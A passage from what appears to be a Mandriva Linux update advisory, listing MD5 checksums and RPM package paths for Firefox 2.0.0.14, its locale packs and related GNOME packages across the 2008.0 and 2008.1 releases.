2008.0/i586/mozilla-firefox-ar-2.0.0.14-1mdv2008.0.i586.rpm 3695f28d452fae78ee0a6e8cfafce92e 2008.0/i586/mozilla-firefox-be-2.0.0.14-1mdv2008.0.i586.rpm bbd068def6254d620aab2da5cbf14e47 2008.0/i586/mozilla-firefox-bg-2.0.0.14-1mdv2008.0.i586.rpm 7b0a2286db805bb2d90ec1d08b40e7fe 2008.0/i586/mozilla-firefox-br_FR-2.0.0.14-1mdv2008.0.i586.rpm f1b99231b0309c856cbb987bf5c7c77e 2008.0/i586/mozilla-firefox-ca-2.0.0.14-1mdv2008.0.i586.rpm 3e0319f97146c148561b679df4e7ea40 2008.0/i586/mozilla-firefox-cs-2.0.0.14-1mdv2008.0.i586.rpm 100e771ba293728909a29fd4cbfdbd10 2008.0/i586/mozilla-firefox-da-2.0.0.14-1mdv2008.0.i586.rpm 9d998fa4bd2019b38b322eb3fe84442c 2008.0/i586/mozilla-firefox-de-2.0.0.14-1mdv2008.0.i586.rpm 9bb12d50f40339662191b39c43d4af11 2008.0/i586/mozilla-firefox-el-2.0.0.14-1mdv2008.0.i586.rpm 8438c2188cc5a8c9044a1c524b18a5d2 2008.0/i586/mozilla-firefox-en_GB-2.0.0.14-1mdv2008.0.i586.rpm 64db1863f1ebf3fefeee62514fdb9ea7 2008.0/i586/mozilla-firefox-es_AR-2.0.0.14-1mdv2008.0.i586.rpm 37e32eb24fdfd120a62ea1a40f435c5d 2008.0/i586/mozilla-firefox-es_ES-2.0.0.14-1mdv2008.0.i586.rpm b04e861f442e0b056bd0afba65236288 2008.0/i586/mozilla-firefox-et_EE-2.0.0.14-1mdv2008.0.i586.rpm f3c7a0fa6bfaeed7175ba5518bcfe61b 2008.0/i586/mozilla-firefox-eu-2.0.0.14-1mdv2008.0.i586.rpm 22d3b3bb6f0b1e185276c4ac0adffabe 2008.0/i586/mozilla-firefox-ext-blogrovr-1.1.779-1mdv2008.0.i586.rpm 8ae4eabed3b87881aaa2e4aab38484d6 2008.0/i586/mozilla-firefox-ext-foxmarks-2.0.45-2mdv2008.0.i586.rpm 4e3aab9ef17b62684671b8a277315d92 2008.0/i586/mozilla-firefox-ext-scribefire-2.1-1mdv2008.0.i586.rpm 4725c9e5e07d48a13a25412564101bf5 2008.0/i586/mozilla-firefox-fi-2.0.0.14-1mdv2008.0.i586.rpm 9ac339a91723d8e9fdfcf5ac09a7b4fe 2008.0/i586/mozilla-firefox-fr-2.0.0.14-1mdv2008.0.i586.rpm f7404ecf0c31d407f39d4306c754df92 2008.0/i586/mozilla-firefox-fy-2.0.0.14-1mdv2008.0.i586.rpm c70ab89f48a37ef9620fc7f1cc2d88c6 2008.0/i586/mozilla-firefox-ga-2.0.0.14-1mdv2008.0.i586.rpm 647d2bfcc1356242797a9606b49acf89 2008.0/i586/mozilla-firefox-gu_IN-2.0.0.14-1mdv2008.0.i586.rpm ff1ea1399e82525d49ef5ca3ab7bed28 2008.0/i586/mozilla-firefox-he-2.0.0.14-1mdv2008.0.i586.rpm 6425df04c925905cbc11be424876172d 2008.0/i586/mozilla-firefox-hu-2.0.0.14-1mdv2008.0.i586.rpm ff718c3251d93cd1ba3015f90584b176 2008.0/i586/mozilla-firefox-it-2.0.0.14-1mdv2008.0.i586.rpm 4383eb6919af28d358952f5a7d11132d 2008.0/i586/mozilla-firefox-ja-2.0.0.14-1mdv2008.0.i586.rpm 679a7809e65f7229e79748f8bc1cc94b 2008.0/i586/mozilla-firefox-ka-2.0.0.14-1mdv2008.0.i586.rpm 75d4064c4303facbe95afe4ba3f838a2 2008.0/i586/mozilla-firefox-ko-2.0.0.14-1mdv2008.0.i586.rpm 5c2d5b33b266891d8b9376bf7fdb2e89 2008.0/i586/mozilla-firefox-ku-2.0.0.14-1mdv2008.0.i586.rpm dd586c55a86ecefa5ae5cbe3ca703157 2008.0/i586/mozilla-firefox-lt-2.0.0.14-1mdv2008.0.i586.rpm 7b32f9c159abc2be912bfd95418fb7a4 2008.0/i586/mozilla-firefox-mk-2.0.0.14-1mdv2008.0.i586.rpm 69c6237278e5aa38e05caa3ca8b13386 2008.0/i586/mozilla-firefox-mn-2.0.0.14-1mdv2008.0.i586.rpm 37199808451011d044ed5059de0903bc 2008.0/i586/mozilla-firefox-nb_NO-2.0.0.14-1mdv2008.0.i586.rpm 49633961bc735d54c6dfe29c6c377f76 2008.0/i586/mozilla-firefox-nl-2.0.0.14-1mdv2008.0.i586.rpm e4f03c142ae2eb94aa5222c512e24e8f 2008.0/i586/mozilla-firefox-nn_NO-2.0.0.14-1mdv2008.0.i586.rpm 99604503db474bfa30d466a7f164d7a4 2008.0/i586/mozilla-firefox-pa_IN-2.0.0.14-1mdv2008.0.i586.rpm f7d963ef30818334775eb3d1911fcb5c 2008.0/i586/mozilla-firefox-pl-2.0.0.14-1mdv2008.0.i586.rpm a3f0c6196d929ac3f57b2627751dc0f3 2008.0/i586/mozilla-firefox-pt_BR-2.0.0.14-1mdv2008.0.i586.rpm 24564c48df5760f82a0a7371fbdfc8c1 2008.0/i586/mozilla-firefox-pt_PT-2.0.0.14-1mdv2008.0.i586.rpm 81964be40681cff3219927df7eff19ec 2008.0/i586/mozilla-firefox-ro-2.0.0.14-1mdv2008.0.i586.rpm 6aee81ef3150ad97d38c8382f6af7e9e 2008.0/i586/mozilla-firefox-ru-2.0.0.14-1mdv2008.0.i586.rpm 134dcaaf53774e629b75e609af1a993d 2008.0/i586/mozilla-firefox-sk-2.0.0.14-1mdv2008.0.i586.rpm 90e3ce1d241cd5e2e652730a85d35429 2008.0/i586/mozilla-firefox-sl-2.0.0.14-1mdv2008.0.i586.rpm 6bfe381e7a4873871dbf58254ff9cade 2008.0/i586/mozilla-firefox-sv_SE-2.0.0.14-1mdv2008.0.i586.rpm 7e83abfbaf98331f599d536b8eb50c49 2008.0/i586/mozilla-firefox-tr-2.0.0.14-1mdv2008.0.i586.rpm d3b7d8ff8ce269024b69188baee18ff4 2008.0/i586/mozilla-firefox-uk-2.0.0.14-1mdv2008.0.i586.rpm 7cfc468ddc662a1fe8e652bc751d587f 2008.0/i586/mozilla-firefox-zh_CN-2.0.0.14-1mdv2008.0.i586.rpm 177e0884095b49fe7081505f149c15d3 2008.0/i586/mozilla-firefox-zh_TW-2.0.0.14-1mdv2008.0.i586.rpm 29fbdf162b42122745d31da4a363458e 2008.0/i586/totem-2.20.1-1.4mdv2008.0.i586.rpm 77018861779887db998d4bc1865783ff 2008.0/i586/totem-common-2.20.1-1.4mdv2008.0.i586.rpm 0ea2d96d188bea1763cb113f7a77ad96 2008.0/i586/totem-gstreamer-2.20.1-1.4mdv2008.0.i586.rpm 21b8ac3addb356f197ac5848078e7c33 2008.0/i586/totem-mozilla-2.20.1-1.4mdv2008.0.i586.rpm 9a24f50de9557bae8efc06b1dddf5f2f 2008.0/i586/totem-mozilla-gstreamer-2.20.1-1.4mdv2008.0.i586.rpm 383657778f8a4fbb8b1bb3d6bfa6072a 2008.0/i586/yelp-2.20.0-3.4mdv2008.0.i586.rpm 2d01bf6ff81b56c9e36ae810e7a1c83f 2008.0/SRPMS/devhelp-0.16-1.5mdv2008.0.src.rpm db7c0f92b1050799e121e9e16397dedd 2008.0/SRPMS/eclipse-3.3.0-0.20.8.5mdv2008.0.src.rpm f17d19e7be4d9ca4f1f48a1d55c860b1 2008.0/SRPMS/epiphany-2.20.0-1.5mdv2008.0.src.rpm 5cc23fac2a79c8b0b10e9894bd3c096a 2008.0/SRPMS/galeon-2.0.3-7.5mdv2008.0.src.rpm bf081776fd1e547e1c476665f6dae7c0 2008.0/SRPMS/gnome-python-extras-2.19.1-4.5mdv2008.0.src.rpm af221a089b9117549f8ff590e67cd53e 2008.0/SRPMS/mozilla-firefox-2.0.0.14-3.1mdv2008.0.src.rpm 4c237f1d5171b362b7f9157a4e886293 2008.0/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-1mdv2008.0.src.rpm c2f6dec233c891f833007a7c9def3f86 2008.0/SRPMS/mozilla-firefox-ext-foxmarks-2.0.45-2mdv2008.0.src.rpm 0d14e8625b32d3ff65eac2fff4a17213 2008.0/SRPMS/mozilla-firefox-ext-scribefire-2.1-1mdv2008.0.src.rpm 627e2b73875d79ba968b10d1a2e9f75d 2008.0/SRPMS/mozilla-firefox-l10n-2.0.0.14-1mdv2008.0.src.rpm 8a6756bb31e4fb6fe65c0325e4203ec5 2008.0/SRPMS/totem-2.20.1-1.4mdv2008.0.src.rpm bce30f91709bc7d04071adb4e2bc738c 2008.0/SRPMS/yelp-2.20.0-3.4mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 47c3c0e31bacb1f4794e6dfb2b2dfc34 2008.0/x86_64/devhelp-0.16-1.5mdv2008.0.x86_64.rpm 32c2621b1655ab226fdec8ab9bbb5773 2008.0/x86_64/devhelp-plugins-0.16-1.5mdv2008.0.x86_64.rpm 3f7d1f676ed1e7b2c9db68b2e9f3ab0e 2008.0/x86_64/eclipse-cvs-client-3.3.0-0.20.8.5mdv2008.0.x86_64.rpm fde7b1d0e2a8c7c8cf84ddf2421f21b1 2008.0/x86_64/eclipse-ecj-3.3.0-0.20.8.5mdv2008.0.x86_64.rpm e7db10bbb0e00ac3f15c9ff38d10547d 2008.0/x86_64/eclipse-jdt-3.3.0-0.20.8.5mdv2008.0.x86_64.rpm 0a7a889c2c47691594275f0854bf3798 2008.0/x86_64/eclipse-pde-3.3.0-0.20.8.5mdv2008.0.x86_64.rpm 6447e3334b8b5548b83b61360dbfbaca 2008.0/x86_64/eclipse-pde-runtime-3.3.0-0.20.8.5mdv2008.0.x86_64.rpm 9c4254acee66837b75f566102e998b1a 2008.0/x86_64/eclipse-platform-3.3.0-0.20.8.5mdv2008.0.x86_64.rpm d3fac34bcab6bd9b0935d35ecbcc4794 2008.0/x86_64/eclipse-rcp-3.3.0-0.20.8.5mdv2008.0.x86_64.rpm 8d7f632a66959afb647f550562ecd475 2008.0/x86_64/epiphany-2.20.0-1.5mdv2008.0.x86_64.rpm ebba66c6614384359e7e93505fbac0ba 2008.0/x86_64/epiphany-devel-2.20.0-1.5mdv2008.0.x86_64.rpm a9446c9f48d0e1ec93c985dedc9cd252 2008.0/x86_64/galeon-2.0.3-7.5mdv2008.0.x86_64.rpm 816246141e077577d6a62a38851752cd 2008.0/x86_64/gnome-python-extras-2.19.1-4.5mdv2008.0.x86_64.rpm 15f7d3111dbce4e16ed37bfeab41bf8f 2008.0/x86_64/gnome-python-gda-2.19.1-4.5mdv2008.0.x86_64.rpm d2b9acf6d378d663b2073154c5f44bc7 2008.0/x86_64/gnome-python-gda-devel-2.19.1-4.5mdv2008.0.x86_64.rpm c130ac9cb7c11af5c0c97814c9421c6c 2008.0/x86_64/gnome-python-gdl-2.19.1-4.5mdv2008.0.x86_64.rpm 2c21e0d9e3d13542412454b2d5867014 2008.0/x86_64/gnome-python-gksu-2.19.1-4.5mdv2008.0.x86_64.rpm a0ef388d3fd44611af2fca5656b11dc8 2008.0/x86_64/gnome-python-gtkhtml2-2.19.1-4.5mdv2008.0.x86_64.rpm bcf7c4d31531013fff2431693eb914de 2008.0/x86_64/gnome-python-gtkmozembed-2.19.1-4.5mdv2008.0.x86_64.rpm 3490d95c4470034ddcf8dcc6c15faa80 2008.0/x86_64/gnome-python-gtkspell-2.19.1-4.5mdv2008.0.x86_64.rpm 17020305ab4938d6c557c0f40c0db24c 2008.0/x86_64/lib64devhelp-1_0-0.16-1.5mdv2008.0.x86_64.rpm 5b48493789ade21b6eea8f0a6e6b68c4 2008.0/x86_64/lib64devhelp-1-devel-0.16-1.5mdv2008.0.x86_64.rpm 85f436e091a955935ebf64d5c58a61b4 2008.0/x86_64/lib64mozilla-firefox2.0.0.14-2.0.0.14-3.1mdv2008.0.x86_64.rpm 5b5180d5070335fd406669c4ed497257 2008.0/x86_64/lib64mozilla-firefox-devel-2.0.0.14-3.1mdv2008.0.x86_64.rpm bb8e1ff9d975d144d3f8f13d6ff74c00 2008.0/x86_64/lib64totem-plparser7-2.20.1-1.4mdv2008.0.x86_64.rpm ff20d8361d886a018cd4aede8bbbdc62 2008.0/x86_64/lib64totem-plparser-devel-2.20.1-1.4mdv2008.0.x86_64.rpm 25c3aef8181a84f22d19e234c2d5e4e9 2008.0/x86_64/libswt3-gtk2-3.3.0-0.20.8.5mdv2008.0.x86_64.rpm 70b6db298ff0ab8e5598f533de4af76e 2008.0/x86_64/mozilla-firefox-2.0.0.14-3.1mdv2008.0.x86_64.rpm 1096d9ad9bb018bbdd1d9fb9a1bbb2ad 2008.0/x86_64/mozilla-firefox-af-2.0.0.14-1mdv2008.0.x86_64.rpm 396add258b15a5bde62d7d3c3bad6b39 2008.0/x86_64/mozilla-firefox-ar-2.0.0.14-1mdv2008.0.x86_64.rpm f5b35c140b1350595faadf174f56a019 2008.0/x86_64/mozilla-firefox-be-2.0.0.14-1mdv2008.0.x86_64.rpm f896907812cf3c92f6dd81d5f7c4e3b4 2008.0/x86_64/mozilla-firefox-bg-2.0.0.14-1mdv2008.0.x86_64.rpm cc94a75a65e827ebbc6a904cd69c823c 2008.0/x86_64/mozilla-firefox-br_FR-2.0.0.14-1mdv2008.0.x86_64.rpm acbdd3ab33734c63abd83aad3861ce27 2008.0/x86_64/mozilla-firefox-ca-2.0.0.14-1mdv2008.0.x86_64.rpm 4f19bf51188f60ae367ff9e249629e21 2008.0/x86_64/mozilla-firefox-cs-2.0.0.14-1mdv2008.0.x86_64.rpm bed37ada79b42d20b84280ab4d1d0c3a 2008.0/x86_64/mozilla-firefox-da-2.0.0.14-1mdv2008.0.x86_64.rpm def54e7d908e1531edb7b298bf699568 2008.0/x86_64/mozilla-firefox-de-2.0.0.14-1mdv2008.0.x86_64.rpm fd8349ee1ca7cb1c125f5a41a26beea5 2008.0/x86_64/mozilla-firefox-el-2.0.0.14-1mdv2008.0.x86_64.rpm f7b785c4a21278036bf15adb9bda1981 2008.0/x86_64/mozilla-firefox-en_GB-2.0.0.14-1mdv2008.0.x86_64.rpm bf26d29802a0050ace1054b7ba4b2fea 2008.0/x86_64/mozilla-firefox-es_AR-2.0.0.14-1mdv2008.0.x86_64.rpm 6976f1fbd614fbe47028dc1b9be04940 2008.0/x86_64/mozilla-firefox-es_ES-2.0.0.14-1mdv2008.0.x86_64.rpm 276bfa35ce4895eb4ccd8cf5ac98a2a5 2008.0/x86_64/mozilla-firefox-et_EE-2.0.0.14-1mdv2008.0.x86_64.rpm bbe6bd6f858ee1a60ec501439b2f4f7f 2008.0/x86_64/mozilla-firefox-eu-2.0.0.14-1mdv2008.0.x86_64.rpm 6a3807951cd579059f381509ae2871a6 2008.0/x86_64/mozilla-firefox-ext-blogrovr-1.1.779-1mdv2008.0.x86_64.rpm 4901fb16d1e3bbb34872cf923ee7dcb5 2008.0/x86_64/mozilla-firefox-ext-foxmarks-2.0.45-2mdv2008.0.x86_64.rpm d095f41d5161b73c95b364a87743c8d5 2008.0/x86_64/mozilla-firefox-ext-scribefire-2.1-1mdv2008.0.x86_64.rpm 15278d3626cb18936c491448268f06e2 2008.0/x86_64/mozilla-firefox-fi-2.0.0.14-1mdv2008.0.x86_64.rpm 310c0ede6f65ba8d3311b85a6d6c221d 2008.0/x86_64/mozilla-firefox-fr-2.0.0.14-1mdv2008.0.x86_64.rpm 27248f841b6d4353f8c68a4470c6289d 2008.0/x86_64/mozilla-firefox-fy-2.0.0.14-1mdv2008.0.x86_64.rpm a15907170600c3f8b64e7bc77acb8131 2008.0/x86_64/mozilla-firefox-ga-2.0.0.14-1mdv2008.0.x86_64.rpm e4daa9de6b73577b9c94deaba83e7d45 2008.0/x86_64/mozilla-firefox-gu_IN-2.0.0.14-1mdv2008.0.x86_64.rpm 6a572cc5b977eba13991d35cb5e238d1 2008.0/x86_64/mozilla-firefox-he-2.0.0.14-1mdv2008.0.x86_64.rpm ce2b08cf204d7fd736d118b4db022dae 2008.0/x86_64/mozilla-firefox-hu-2.0.0.14-1mdv2008.0.x86_64.rpm d04cc6a1c9ac42a0d8f8260dcb1b091c 2008.0/x86_64/mozilla-firefox-it-2.0.0.14-1mdv2008.0.x86_64.rpm 9b1b35c470777e40761823a695e58b3e 2008.0/x86_64/mozilla-firefox-ja-2.0.0.14-1mdv2008.0.x86_64.rpm 8c74c8b924d9707123f4349fc30c0f67 2008.0/x86_64/mozilla-firefox-ka-2.0.0.14-1mdv2008.0.x86_64.rpm ea7e85e4b9f235d4e8bcc792e2c588f6 2008.0/x86_64/mozilla-firefox-ko-2.0.0.14-1mdv2008.0.x86_64.rpm 5053579e898ebcbe7a64bd91c9d7a1a8 2008.0/x86_64/mozilla-firefox-ku-2.0.0.14-1mdv2008.0.x86_64.rpm ab5c2db1fb67f6e3a7b039f8de5148bb 2008.0/x86_64/mozilla-firefox-lt-2.0.0.14-1mdv2008.0.x86_64.rpm 0ed771f7fc7faecd108d4973bcccd6db 2008.0/x86_64/mozilla-firefox-mk-2.0.0.14-1mdv2008.0.x86_64.rpm 6ac34739c5f8d65333538037fc69c3a7 2008.0/x86_64/mozilla-firefox-mn-2.0.0.14-1mdv2008.0.x86_64.rpm 7b9d8df13b661cb04991877e0fa1816e 2008.0/x86_64/mozilla-firefox-nb_NO-2.0.0.14-1mdv2008.0.x86_64.rpm 40b51ea032856c38f2887ea8539e0ba2 2008.0/x86_64/mozilla-firefox-nl-2.0.0.14-1mdv2008.0.x86_64.rpm d736db29bb13957a914de9bf137ad538 2008.0/x86_64/mozilla-firefox-nn_NO-2.0.0.14-1mdv2008.0.x86_64.rpm ebbbc71c80f30023453013fb69c74645 2008.0/x86_64/mozilla-firefox-pa_IN-2.0.0.14-1mdv2008.0.x86_64.rpm b347ea93f935b3416f79e2e855020cdf 2008.0/x86_64/mozilla-firefox-pl-2.0.0.14-1mdv2008.0.x86_64.rpm 345107f319ffa59ad9dead0d1f19d35f 2008.0/x86_64/mozilla-firefox-pt_BR-2.0.0.14-1mdv2008.0.x86_64.rpm 8a3fdd653d716798a5abfd24994540aa 2008.0/x86_64/mozilla-firefox-pt_PT-2.0.0.14-1mdv2008.0.x86_64.rpm 0a15216d431bc85b6e3e98c1eed57086 2008.0/x86_64/mozilla-firefox-ro-2.0.0.14-1mdv2008.0.x86_64.rpm 8c53dc298853403bf7f5ff894734bdc4 2008.0/x86_64/mozilla-firefox-ru-2.0.0.14-1mdv2008.0.x86_64.rpm afb7d8b39ffbacfd6f7c56da98628a33 2008.0/x86_64/mozilla-firefox-sk-2.0.0.14-1mdv2008.0.x86_64.rpm 9601219b83e2e0fe9d3aeb608c5899dd 2008.0/x86_64/mozilla-firefox-sl-2.0.0.14-1mdv2008.0.x86_64.rpm 75633b4840b851847ead1b0dae51c929 2008.0/x86_64/mozilla-firefox-sv_SE-2.0.0.14-1mdv2008.0.x86_64.rpm 046b5fe993a4acb69230e9b9dcd04ea1 2008.0/x86_64/mozilla-firefox-tr-2.0.0.14-1mdv2008.0.x86_64.rpm c48e5f19bcc3aa5e65f9e108e69323b7 2008.0/x86_64/mozilla-firefox-uk-2.0.0.14-1mdv2008.0.x86_64.rpm b673ca6ba27c7dc8d42c4d6c97fd867c 2008.0/x86_64/mozilla-firefox-zh_CN-2.0.0.14-1mdv2008.0.x86_64.rpm 00c791407518f4c110744252d9852111 2008.0/x86_64/mozilla-firefox-zh_TW-2.0.0.14-1mdv2008.0.x86_64.rpm 3bed6102d675f8777bd79b0da58b8592 2008.0/x86_64/totem-2.20.1-1.4mdv2008.0.x86_64.rpm 2cc149e282287401fd9f43b5fb9e9699 2008.0/x86_64/totem-common-2.20.1-1.4mdv2008.0.x86_64.rpm 03951d6df704ea46e6e1d12fd1a3e84a 2008.0/x86_64/totem-gstreamer-2.20.1-1.4mdv2008.0.x86_64.rpm eee793beecf9603ac0b1a7fc0309218b 2008.0/x86_64/totem-mozilla-2.20.1-1.4mdv2008.0.x86_64.rpm 86da6f03daf056c4c9b24f8b76323e09 2008.0/x86_64/totem-mozilla-gstreamer-2.20.1-1.4mdv2008.0.x86_64.rpm b46389ffd4f08a0a550d189c4ada6aad 2008.0/x86_64/yelp-2.20.0-3.4mdv2008.0.x86_64.rpm 2d01bf6ff81b56c9e36ae810e7a1c83f 2008.0/SRPMS/devhelp-0.16-1.5mdv2008.0.src.rpm db7c0f92b1050799e121e9e16397dedd 2008.0/SRPMS/eclipse-3.3.0-0.20.8.5mdv2008.0.src.rpm f17d19e7be4d9ca4f1f48a1d55c860b1 2008.0/SRPMS/epiphany-2.20.0-1.5mdv2008.0.src.rpm 5cc23fac2a79c8b0b10e9894bd3c096a 2008.0/SRPMS/galeon-2.0.3-7.5mdv2008.0.src.rpm bf081776fd1e547e1c476665f6dae7c0 2008.0/SRPMS/gnome-python-extras-2.19.1-4.5mdv2008.0.src.rpm af221a089b9117549f8ff590e67cd53e 2008.0/SRPMS/mozilla-firefox-2.0.0.14-3.1mdv2008.0.src.rpm 4c237f1d5171b362b7f9157a4e886293 2008.0/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-1mdv2008.0.src.rpm c2f6dec233c891f833007a7c9def3f86 2008.0/SRPMS/mozilla-firefox-ext-foxmarks-2.0.45-2mdv2008.0.src.rpm 0d14e8625b32d3ff65eac2fff4a17213 2008.0/SRPMS/mozilla-firefox-ext-scribefire-2.1-1mdv2008.0.src.rpm 627e2b73875d79ba968b10d1a2e9f75d 2008.0/SRPMS/mozilla-firefox-l10n-2.0.0.14-1mdv2008.0.src.rpm 8a6756bb31e4fb6fe65c0325e4203ec5 2008.0/SRPMS/totem-2.20.1-1.4mdv2008.0.src.rpm bce30f91709bc7d04071adb4e2bc738c 2008.0/SRPMS/yelp-2.20.0-3.4mdv2008.0.src.rpm Mandriva Linux 2008.1: 1c443ec83a71e9f2cb522e8ba82721e4 2008.1/i586/devhelp-0.19-3.1mdv2008.1.i586.rpm 4dd93d21e7b30e44863dd9fb20e7306f 2008.1/i586/devhelp-plugins-0.19-3.1mdv2008.1.i586.rpm 41302d2e992fd73177d6213ba32f09f8 2008.1/i586/epiphany-2.22.0-4.1mdv2008.1.i586.rpm 85ca6715403cccdc33563a807a7ac1fa 2008.1/i586/epiphany-devel-2.22.0-4.1mdv2008.1.i586.rpm 6fca9c31c0fde44f96aa7eb9b7100be1 2008.1/i586/galeon-2.0.4-3.1mdv2008.1.i586.rpm 2fae4bfed9462248828d5016a0c0dbe0 2008.1/i586/gnome-python-extras-2.19.1-10.1mdv2008.1.i586.rpm c1fa721fceb5617800b79543e44afac5 2008.1/i586/gnome-python-gda-2.19.1-10.1mdv2008.1.i586.rpm ed6888a8bb310e2d90006aff7594ad17 2008.1/i586/gnome-python-gda-devel-2.19.1-10.1mdv2008.1.i586.rpm a83f24a05f85c40f2b6dbf1d18e4eb50 2008.1/i586/gnome-python-gdl-2.19.1-10.1mdv2008.1.i586.rpm 383ba168f14d1bde589fef4fece705c5 2008.1/i586/gnome-python-gksu-2.19.1-10.1mdv2008.1.i586.rpm 6daa3df40ba00f2e165fef536b55e46b 2008.1/i586/gnome-python-gtkhtml2-2.19.1-10.1mdv2008.1.i586.rpm f7accbde9de2d319d8387b0197738b7c 2008.1/i586/gnome-python-gtkmozembed-2.19.1-10.1mdv2008.1.i586.rpm 22623d4b6862e688adc55bf8f9640a58 2008.1/i586/gnome-python-gtkspell-2.19.1-10.1mdv2008.1.i586.rpm ca0801ee0602b18d1d56c7da25573031 2008.1/i586/libdevhelp-1_0-0.19-3.1mdv2008.1.i586.rpm 632863954a9f47f7ae0bc26cd6ad6862 2008.1/i586/libdevhelp-1-devel-0.19-3.1mdv2008.1.i586.rpm de40ed6999cf2acdd3a582539e3b8d75 2008.1/i586/libgluezilla0-1.2.6.1-2.1mdv2008.1.i586.rpm 31a6ed466f95a27ab6d366b5aacb1fca 2008.1/i586/libmozilla-firefox2.0.0.14-2.0.0.14-3.1mdv2008.1.i586.rpm 65c52e7798626f88200af6dddac95d4f 2008.1/i586/libmozilla-firefox-devel-2.0.0.14-3.1mdv2008.1.i586.rpm d6a9999d7be795a4454795f3f7b14d2b 2008.1/i586/mozilla-firefox-2.0.0.14-3.1mdv2008.1.i586.rpm 522dbf3e49459d74efd127d7815ef408 2008.1/i586/mozilla-firefox-af-2.0.0.14-1mdv2008.1.i586.rpm 0dc072f41c25240141a2f22555751419 2008.1/i586/mozilla-firefox-ar-2.0.0.14-1mdv2008.1.i586.rpm de42ae9edc0c4f87f7d986a3a436744e 2008.1/i586/mozilla-firefox-be-2.0.0.14-1mdv2008.1.i586.rpm bb3a7f7291c006181308a3108f5f7913 2008.1/i586/mozilla-firefox-bg-2.0.0.14-1mdv2008.1.i586.rpm b533484524a197b37d8839eef5428073 2008.1/i586/mozilla-firefox-br_FR-2.0.0.14-1mdv2008.1.i586.rpm b27a1c33852e10c8a3437de358018907 2008.1/i586/mozilla-firefox-ca-2.0.0.14-1mdv2008.1.i586.rpm ea6366c2d7f7b8d83f1d587ab7b38f46 2008.1/i586/mozilla-firefox-cs-2.0.0.14-1mdv2008.1.i586.rpm 6cb47debd3c594ba85a7e4b9f44e9ccb 2008.1/i586/mozilla-firefox-da-2.0.0.14-1mdv2008.1.i586.rpm b3dbb1d20adcada61d9732b0b42a2988 2008.1/i586/mozilla-firefox-de-2.0.0.14-1mdv2008.1.i586.rpm 376d193553e5e5a3f489b336e09c357b 2008.1/i586/mozilla-firefox-el-2.0.0.14-1mdv2008.1.i586.rpm 8412eff5e8da9d83aa16d8953003afa8 2008.1/i586/mozilla-firefox-en_GB-2.0.0.14-1mdv2008.1.i586.rpm af252364e8405f6cb7519354a3bedb43 2008.1/i586/mozilla-firefox-es_AR-2.0.0.14-1mdv2008.1.i586.rpm 714e8de5f166bf6fd23e8785822f70c0 2008.1/i586/mozilla-firefox-es_ES-2.0.0.14-1mdv2008.1.i586.rpm 6e5b0ed2337e44447839200f2614e273 2008.1/i586/mozilla-firefox-et_EE-2.0.0.14-1mdv2008.1.i586.rpm 6c8efcf50a55ea6ff68b6ebfa4ff716f 2008.1/i586/mozilla-firefox-eu-2.0.0.14-1mdv2008.1.i586.rpm ca1688e45e4c03de67006074bba432cb 2008.1/i586/mozilla-firefox-ext-blogrovr-1.1.779-1mdv2008.1.i586.rpm fe11c5cc8b3ddafe85841bdb1276e68e 2008.1/i586/mozilla-firefox-ext-foxmarks-2.0.45-2mdv2008.1.i586.rpm 78faec595ef5e8cfd54730234a9f3c47 2008.1/i586/mozilla-firefox-ext-scribefire-2.1-1mdv2008.1.i586.rpm 88517327f87a8eb7e235c55e27645f68 2008.1/i586/mozilla-firefox-fi-2.0.0.14-1mdv2008.1.i586.rpm 9aa37df84e53969140cc9848cf92fbfd 2008.1/i586/mozilla-firefox-fr-2.0.0.14-1mdv2008.1.i586.rpm 6183814d2471f12ce807edc7d8d223f8 2008.1/i586/mozilla-firefox-fy-2.0.0.14-1mdv2008.1.i586.rpm ba841947bb083f3215020c60bd0fca9e 2008.1/i586/mozilla-firefox-ga-2.0.0.14-1mdv2008.1.i586.rpm adcc1e6c59d3642441c5f50dd1476100 2008.1/i586/mozilla-firefox-gnome-support-2.0.0.14-3.1mdv2008.1.i586.rpm 4ff296bb7a2149820a7bf06f859dafd8 2008.1/i586/mozilla-firefox-gu_IN-2.0.0.14-1mdv2008.1.i586.rpm fe143d660bce1c059c37d60138493386 2008.1/i586/mozilla-firefox-he-2.0.0.14-1mdv2008.1.i586.rpm 02f93e676c53cf4ad35682fced00988b 2008.1/i586/mozilla-firefox-hu-2.0.0.14-1mdv2008.1.i586.rpm 7dd402da2845601653e64f2d9cf44e86 2008.1/i586/mozilla-firefox-it-2.0.0.14-1mdv2008.1.i586.rpm 9c891dafc2f9e388abf66a6285b0def2 2008.1/i586/mozilla-firefox-ja-2.0.0.14-1mdv2008.1.i586.rpm cc1af58e1e40b41c5446c8fe7b0add46 2008.1/i586/mozilla-firefox-ka-2.0.0.14-1mdv2008.1.i586.rpm 56a704330f4c83db9ef8f827a5262e70 2008.1/i586/mozilla-firefox-ko-2.0.0.14-1mdv2008.1.i586.rpm 8cbc3d5d65c68f998c45e3367d078eab 2008.1/i586/mozilla-firefox-ku-2.0.0.14-1mdv2008.1.i586.rpm cf9cfa3a41b857cdbe92c7c79e7cb629 2008.1/i586/mozilla-firefox-lt-2.0.0.14-1mdv2008.1.i586.rpm 0e5bacb575919f1418fa86ca12d38eae 2008.1/i586/mozilla-firefox-mk-2.0.0.14-1mdv2008.1.i586.rpm e0983defa4d9afa751ab440088dea490 2008.1/i586/mozilla-firefox-mn-2.0.0.14-1mdv2008.1.i586.rpm 042a1c4337fe86a0d9b9142f100ffe12 2008.1/i586/mozilla-firefox-nb_NO-2.0.0.14-1mdv2008.1.i586.rpm 619dfb48aefa2e512f82addc4db365a6 2008.1/i586/mozilla-firefox-nl-2.0.0.14-1mdv2008.1.i586.rpm 3ffcb8646cdcb7ce7d844441d3e3b8ec 2008.1/i586/mozilla-firefox-nn_NO-2.0.0.14-1mdv2008.1.i586.rpm ca3f5b3390f780fd574179dcc572ac6e 2008.1/i586/mozilla-firefox-pa_IN-2.0.0.14-1mdv2008.1.i586.rpm 410224ae73e8a6e4c14504e7e2398d8b 2008.1/i586/mozilla-firefox-pl-2.0.0.14-1mdv2008.1.i586.rpm 1b5f5288d67dbf69dd59f49bbf425d47 2008.1/i586/mozilla-firefox-pt_BR-2.0.0.14-1mdv2008.1.i586.rpm a6ec1bac1a0180eb8c30930c36787588 2008.1/i586/mozilla-firefox-pt_PT-2.0.0.14-1mdv2008.1.i586.rpm c47c5ce8b46f58dd969ec292819f4ceb 2008.1/i586/mozilla-firefox-ro-2.0.0.14-1mdv2008.1.i586.rpm 35d572d6dccf81df0054c86b3664bacf 